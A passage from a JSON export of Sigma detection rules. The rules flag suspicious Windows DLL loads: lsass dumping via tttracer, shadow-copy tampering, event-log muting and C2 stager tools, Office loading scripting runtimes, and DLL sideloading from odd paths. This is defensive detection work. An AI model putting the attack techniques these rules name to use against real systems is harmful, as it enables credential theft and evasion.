    "content": "title: Time Travel Debugging Utility Usage - Image\nid: e76c8240-d68f-4773-8880-5c6f63595aaf\nstatus: test\ndescription: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/\n    - https://twitter.com/mattifestation/status/1196390321783025666\n    - https://twitter.com/oulusoyum/status/1191329746069655553\nauthor: 'Ensar Şamil, @sblmsrsn, @oscd_initiative'\ndate: 2020-10-06\nmodified: 2022-12-02\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1218\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\ttdrecord.dll'\n            - '\\ttdwriter.dll'\n            - '\\ttdloader.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate usage by software developers/testers\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_unsigned_node_load.yml",
    "content": "title: Unsigned .node File Loaded\nid: e5f5c693-52d7-4de5-88ae-afbfbce85595\nstatus: experimental\ndescription: |\n    Detects the loading of unsigned .node files.\n    Adversaries may abuse a lack of .node integrity checking to execute arbitrary code inside of trusted applications such as Slack.\n    .node files are native add-ons for Electron-based applications, which are commonly used for desktop applications like Slack, Discord, and Visual Studio Code.\n    This technique has been observed in the DripLoader malware, which uses unsigned .node files to load malicious native code into Electron applications.\nreferences:\n    - https://www.coreycburton.com/blog/driploader-case-study\n    - https://github.com/CoreyCBurton/DripLoaderNG\n    - https://www.electronjs.org/docs/latest/tutorial/native-code-and-electron\nauthor: Jonathan Beierle (@hullabrian)\ndate: 2025-11-22\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1129\n    - attack.t1574.001\n    - attack.t1036.005\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_node_extension:\n        ImageLoaded|endswith: '.node'\n    selection_status:\n        - Signed: 'false'\n        - SignatureStatus: 'Unavailable'\n    filter_optional_vscode_jupyter:\n        Image|endswith: '\\Code.exe'\n        ImageLoaded|contains: '.vscode\\extensions\\ms-toolsai.jupyter-'\n        ImageLoaded|endswith:\n            - '\\electron.napi.node'\n            - '\\node.napi.glibc.node'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - VsCode extensions or similar legitimate tools might use unsigned .node files. These should be investigated on a case-by-case basis, and whitelisted if determined to be benign.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml",
    "content": "title: Suspicious Volume Shadow Copy VSS_PS.dll Load\nid: 333cdbe8-27bb-4246-bf82-b41a0dca4b70\nrelated:\n    - id: 48bfd177-7cf2-412b-ad77-baf923489e82 # vsstrace.dll\n      type: similar\n    - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 # vssapi.dll\n      type: similar\nstatus: test\ndescription: |\n    Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes.\n    It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts.\n    The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity.\nreferences:\n    - https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add\n    - https://twitter.com/am0nsec/status/1412232114980982787\nauthor: Markus Neis, @markus_neis\ndate: 2021-07-07\nmodified: 2025-07-11\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\vss_ps.dll'\n    filter_main_legit:\n        Image|startswith: 'C:\\Windows\\'\n        Image|endswith:\n            - '\\clussvc.exe'\n            - '\\dismhost.exe'\n            - '\\dllhost.exe'\n            - '\\inetsrv\\appcmd.exe'\n            - '\\inetsrv\\iissetup.exe'\n            - '\\msiexec.exe'\n            - '\\rundll32.exe'\n            - '\\searchindexer.exe'\n            - '\\srtasks.exe'\n            - '\\svchost.exe'\n            - '\\System32\\SystemPropertiesAdvanced.exe'\n            - '\\taskhostw.exe'\n            - '\\thor.exe'\n            - '\\thor64.exe'\n            - '\\tiworker.exe'\n            - '\\vssvc.exe'\n            - '\\vssadmin.exe'\n            - '\\WmiPrvSE.exe'\n            - '\\wsmprovhost.exe'\n    filter_main_update:\n        CommandLine|startswith: 'C:\\$WinREAgent\\Scratch\\'\n        CommandLine|contains: '\\dismhost.exe {'\n    filter_main_image_null:\n        Image: null\n    filter_optional_programfiles:\n        # When using this rule in your environment replace the \"Program Files\" folder by the exact applications you know use this. Examples would be software such as backup solutions\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_vssapi_susp_load.yml",
    "content": "title: Suspicious Volume Shadow Copy Vssapi.dll Load\nid: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8\nrelated:\n    - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 # vss_ps.dll\n      type: similar\n    - id: 48bfd177-7cf2-412b-ad77-baf923489e82 # vsstrace.dll\n      type: similar\nstatus: test\ndescription: Detects the image load of VSS DLL by uncommon executables\nreferences:\n    - https://github.com/ORCx41/DeleteShadowCopies\nauthor: frack113\ndate: 2022-10-31\nmodified: 2025-10-17\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\vssapi.dll'\n    filter_main_windows:\n        - Image:\n              - 'C:\\Windows\\explorer.exe'\n              - 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n        - Image|startswith:\n              - 'C:\\Windows\\System32\\'\n              - 'C:\\Windows\\SysWOW64\\'\n              - 'C:\\Windows\\Temp\\{' # Installers\n              - 'C:\\Windows\\WinSxS\\'\n    filter_main_program_files:\n        # When using this rule in your environment replace the \"Program Files\" folder by the exact applications you know use this. Examples would be software such as backup solutions\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_main_null_image:\n        Image: null\n    filter_optional_programdata_packagecache:\n        # The following filter is required because of many FPs cause by:\n        #   C:\\ProgramData\\Package Cache\\{10c6cfdc-27af-43fe-bbd3-bd20aae88451}\\dotnet-sdk-3.1.425-win-x64.exe\n        #   C:\\ProgramData\\Package Cache\\{b9cfa33e-ace4-49f4-8bb4-82ded940990a}\\windowsdesktop-runtime-6.0.11-win-x86.exe\n        #   C:\\ProgramData\\Package Cache\\{50264ff2-ad47-4569-abc4-1c350f285fb9}\\aspnetcore-runtime-6.0.11-win-x86.exe\n        #   C:\\ProgramData\\Package Cache\\{2dcef8c3-1563-4149-a6ec-5b6c98500d7d}\\dotnet-sdk-6.0.306-win-x64.exe\n        #   etc.\n        Image|startswith: 'C:\\ProgramData\\Package Cache\\'\n    filter_optional_avira:\n        Image|contains|all:\n            - '\\temp\\is-'\n            - '\\avira_system_speedup.tmp'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_vsstrace_susp_load.yml",
    "content": "title: Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load\nid: 48bfd177-7cf2-412b-ad77-baf923489e82\nrelated:\n    - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 # vss_ps.dll\n      type: similar\n    - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 # vssapi.dll\n      type: similar\nstatus: test\ndescription: Detects the image load of VSS DLL by uncommon executables\nreferences:\n    - https://github.com/ORCx41/DeleteShadowCopies\nauthor: frack113\ndate: 2023-02-17\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\vsstrace.dll'\n    filter_main_windows:\n        - Image:\n              - 'C:\\Windows\\explorer.exe'\n              - 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n        - Image|startswith:\n              - 'C:\\Windows\\System32\\'\n              - 'C:\\Windows\\SysWOW64\\'\n              - 'C:\\Windows\\Temp\\{' # Installers\n              - 'C:\\Windows\\WinSxS\\'\n              - 'C:\\ProgramData\\Package Cache\\{'  # Microsoft Visual Redistributable installer  VC_redist/vcredist EXE\n    filter_main_program_files:\n        # When using this rule in your environment replace the \"Program Files\" folder by the exact applications you know use this. Examples would be software such as backup solutions\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_optional_recovery:\n        Image|startswith: 'C:\\$WinREAgent\\Scratch\\'\n    filter_main_null_image:\n        Image: null # Observed through Aurora\n    filter_optional_avira:\n        Image|contains|all:\n            - '\\temp\\is-'\n            - '\\avira_system_speedup.tmp'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_hktl_sharpevtmute.yml",
    "content": "title: HackTool - SharpEvtMute DLL Load\nid: 49329257-089d-46e6-af37-4afce4290685\nrelated:\n    - id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c # Process Creation\n      type: similar\nstatus: test\ndescription: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs\nreferences:\n    - https://github.com/bats3c/EvtMute\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-07\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Hashes|contains: 'IMPHASH=330768A4F172E10ACB6287B87289D83B'\n    condition: selection\nfalsepositives:\n    - Other DLLs with the same Imphash\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_hktl_silenttrinity_stager.yml",
    "content": "title: HackTool - SILENTTRINITY Stager DLL Load\nid: 75c505b1-711d-4f68-a357-8c3fe37dbf2d\nrelated:\n    - id: 03552375-cc2c-4883-bbe4-7958d5a980be # Process Creation\n      type: derived\nstatus: test\ndescription: Detects SILENTTRINITY stager dll loading activity\nreferences:\n    - https://github.com/byt3bl33d3r/SILENTTRINITY\nauthor: Aleksey Potapov, oscd.community\ndate: 2019-10-22\nmodified: 2023-02-17\ntags:\n    - attack.command-and-control\n    - attack.t1071\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Description|contains: 'st2stager'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml",
    "content": "title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load\nid: f354eba5-623b-450f-b073-0b5b2773b6aa\nrelated:\n    - id: e554f142-5cf3-4e55-ace9-a1b59e0def65\n      type: obsolete\n    - id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa\n      type: similar\nstatus: test\ndescription: Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga\ndate: 2020-10-12\nmodified: 2022-12-18\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1021.003\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\Internet Explorer\\iexplore.exe'\n        ImageLoaded|endswith: '\\Internet Explorer\\iertutil.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/image_load/image_load_lsass_unsigned_image_load.yml",
    "content": "title: Unsigned Image Loaded Into LSASS Process\nid: 857c8db3-c89b-42fb-882b-f681c7cf4da2\nstatus: test\ndescription: Loading unsigned image (DLL, EXE) into LSASS process\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-10-22\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\lsass.exe'\n        Signed: 'false'\n    condition: selection\nfalsepositives:\n    - Valid user connecting using RDP\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_dotnet_assembly_dll_load.yml",
    "content": "title: DotNET Assembly DLL Loaded Via Office Application\nid: ff0f2b05-09db-4095-b96d-1b75ca24894a\nstatus: test\ndescription: Detects any assembly DLL being loaded by an Office Product\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2023-03-29\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|startswith: 'C:\\Windows\\assembly\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_dotnet_clr_dll_load.yml",
    "content": "title: CLR DLL Loaded Via Office Applications\nid: d13c43f0-f66b-4279-8b2c-5912077c1780\nstatus: test\ndescription: Detects CLR DLL being loaded by an Office Product\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2023-03-29\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\outlook.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|contains: '\\clr.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_dotnet_gac_dll_load.yml",
    "content": "title: GAC DLL Loaded Via Office Applications\nid: 90217a70-13fc-48e4-b3db-0d836c5824ac\nstatus: test\ndescription: Detects any GAC DLL being loaded by an Office Product\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2023-02-10\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|startswith: 'C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL'\n    condition: selection\nfalsepositives:\n    - Legitimate macro usage. Add the appropriate filter according to your environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_excel_xll_susp_load.yml",
    "content": "title: Microsoft Excel Add-In Loaded From Uncommon Location\nid: af4c4609-5755-42fe-8075-4effb49f5d44\nrelated:\n    - id: c5f4b5cb-4c25-4249-ba91-aa03626e3185\n      type: derived\nstatus: test\ndescription: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location\nreferences:\n    - https://www.mandiant.com/resources/blog/lnk-between-browsers\n    - https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-12\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\excel.exe'\n        ImageLoaded|contains:\n            # Note: Add or remove locations from this list based on your internal policy\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Perflogs\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Tasks\\'\n        ImageLoaded|endswith: '.xll'\n    condition: selection\nfalsepositives:\n    - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_outlook_outlvba_load.yml",
    "content": "title: Microsoft VBA For Outlook Addin Loaded Via Outlook\nid: 9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed\nstatus: test\ndescription: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\nmodified: 2024-03-12\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\outlook.exe'\n        ImageLoaded|endswith: '\\outlvba.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate macro usage. Add the appropriate filter according to your environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_powershell_dll_load.yml",
    "content": "title: PowerShell Core DLL Loaded Via Office Application\nid: bb2ba6fb-95d4-4a25-89fc-30bb736c021a\nstatus: test\ndescription: Detects PowerShell core DLL being loaded by an Office Product\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-01\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\outlook.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|contains:\n            - '\\System.Management.Automation.Dll'\n            - '\\System.Management.Automation.ni.Dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_office_vbadll_load.yml",
    "content": "title: VBA DLL Loaded Via Office Application\nid: e6ce8457-68b1-485b-9bdd-3c2b5d679aa9\nstatus: test\ndescription: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2023-02-10\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|endswith:\n            - '\\VBE7.DLL'\n            - '\\VBEUI.DLL'\n            - '\\VBE7INTL.DLL'\n    condition: selection\nfalsepositives:\n    - Legitimate macro usage. Add the appropriate filter according to your environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_rundll32_remote_share_load.yml",
    "content": "title: Remote DLL Load Via Rundll32.EXE\nid: f40017b3-cb2e-4335-ab5d-3babf679c1de\nstatus: test\ndescription: Detects a remote DLL load event via \"rundll32.exe\".\nreferences:\n    - https://github.com/gabe-k/themebleed\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-18\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        ImageLoaded|startswith: '\\\\\\\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml",
    "content": "title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load\nid: b439f47d-ef52-4b29-9a2f-57d8a96cb6b8\nstatus: test\ndescription: Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.\nreferences:\n    - https://twitter.com/HunterPlaybook/status/1301207718355759107\n    - https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/\n    - https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-09-02\nmodified: 2023-02-22\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\scrcons.exe'\n        ImageLoaded|endswith:\n            - '\\vbscript.dll'\n            - '\\wbemdisp.dll'\n            - '\\wshom.ocx'\n            - '\\scrrun.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate event consumers\n    - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_7za.yml",
    "content": "title: Potential 7za.DLL Sideloading\nid: 4f6edb78-5c21-42ab-a558-fd2a6fc1fd57\nstatus: test\ndescription: Detects potential DLL sideloading of \"7za.dll\"\nreferences:\n    - https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d\nauthor: X__Junior\ndate: 2023-06-09\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\7za.dll'\n    filter_main_legit_path:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate third party application located in \"AppData\" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed.\nlevel: low\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_abused_dlls_susp_paths.yml",
    "content": "title: Abusable DLL Potential Sideloading From Suspicious Location\nid: 799a5f48-0ac1-4e0f-9152-71d137d48c2a\nstatus: test\ndescription: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html\n    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-11\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_dll:\n        ImageLoaded|endswith:\n            # Note: Add more generic DLLs that cannot be pin-pointed to a single application\n            - '\\coreclr.dll'\n            - '\\facesdk.dll'\n            - '\\HPCustPartUI.dll'\n            - '\\libcef.dll'\n            - '\\ZIPDLL.dll'\n    selection_folders_1:\n        ImageLoaded|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - '\\Temporary Internet'\n            - '\\Windows\\Temp\\'\n    selection_folders_2:\n        - ImageLoaded|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - ImageLoaded|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - ImageLoaded|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - ImageLoaded|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    condition: selection_dll and 1 of selection_folders_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_antivirus.yml",
    "content": "title: Potential Antivirus Software DLL Sideloading\nid: 552b6b65-df37-4d3e-a258-f2fc4771ae54\nstatus: test\ndescription: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc\nreferences:\n    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-08-17\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    # Bitdefender\n    selection_bitdefender:\n        ImageLoaded|endswith: '\\log.dll'\n    filter_log_dll_bitdefender:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\Bitdefender Antivirus Free\\'\n            - 'C:\\Program Files (x86)\\Bitdefender Antivirus Free\\'\n    filter_log_dll_dell_sar:\n        Image: 'C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe'\n        ImageLoaded:\n            - 'C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll'\n            - 'C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll'\n    filter_log_dll_canon:\n        ImageLoaded|startswith: 'C:\\Program Files\\Canon\\MyPrinter\\'\n    filter_log_dll_avast:\n        ImageLoaded:\n            - 'C:\\Program Files\\AVAST Software\\Avast\\log.dll'\n            - 'C:\\Program Files (x86)\\AVAST Software\\Avast\\log.dll'\n    filter_log_dll_avg:\n        ImageLoaded:\n            - 'C:\\Program Files\\AVG\\Antivirus\\log.dll'\n            - 'C:\\Program Files (x86)\\AVG\\Antivirus\\log.dll'\n    # F-Secure\n    selection_fsecure:\n        ImageLoaded|endswith: '\\qrt.dll'\n    filter_fsecure:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\F-Secure\\Anti-Virus\\'\n            - 'C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\'\n    # McAfee\n    selection_mcafee:\n        ImageLoaded|endswith:\n            - '\\ashldres.dll'\n            - '\\lockdown.dll'\n            - '\\vsodscpl.dll'\n    filter_mcafee:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\McAfee\\'\n            - 'C:\\Program Files (x86)\\McAfee\\'\n    # CyberArk\n    selection_cyberark:\n        ImageLoaded|endswith: '\\vftrace.dll'\n    filter_cyberark:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\'\n            - 'C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\'\n    # Avast\n    selection_avast:\n        ImageLoaded|endswith: '\\wsc.dll'\n    filter_wsc_dll_avast:\n        ImageLoaded|startswith:\n            - 'C:\\program Files\\AVAST Software\\Avast\\'\n            - 'C:\\program Files (x86)\\AVAST Software\\Avast\\'\n    filter_wsc_dll_avg:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\AVG\\Antivirus\\'\n            - 'C:\\Program Files (x86)\\AVG\\Antivirus\\'\n    # ESET\n    selection_eset_deslock:\n        ImageLoaded|endswith: '\\DLPPREM32.dll'\n    filter_eset_deslock:\n        ImageLoaded|startswith:\n            - 'C:\\program Files\\ESET'\n            - 'C:\\program Files (x86)\\ESET'\n    # Trend Micro Titanium\n    selection_titanium:\n        ImageLoaded|endswith: '\\tmdbglog.dll'\n    filter_titanium:\n        ImageLoaded|startswith:\n            - 'C:\\program Files\\Trend Micro\\Titanium\\'\n            - 'C:\\program Files (x86)\\Trend Micro\\Titanium\\'\n    condition: (selection_bitdefender and not 1 of filter_log_dll_*)\n               or (selection_fsecure and not filter_fsecure)\n               or (selection_mcafee and not filter_mcafee)\n               or (selection_cyberark and not filter_cyberark)\n               or (selection_avast and not 1 of filter_wsc_dll_*)\n               or (selection_titanium and not filter_titanium)\n               or (selection_eset_deslock and not filter_eset_deslock)\nfalsepositives:\n    - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.\n    - Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.\n    - The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_appverifui.yml",
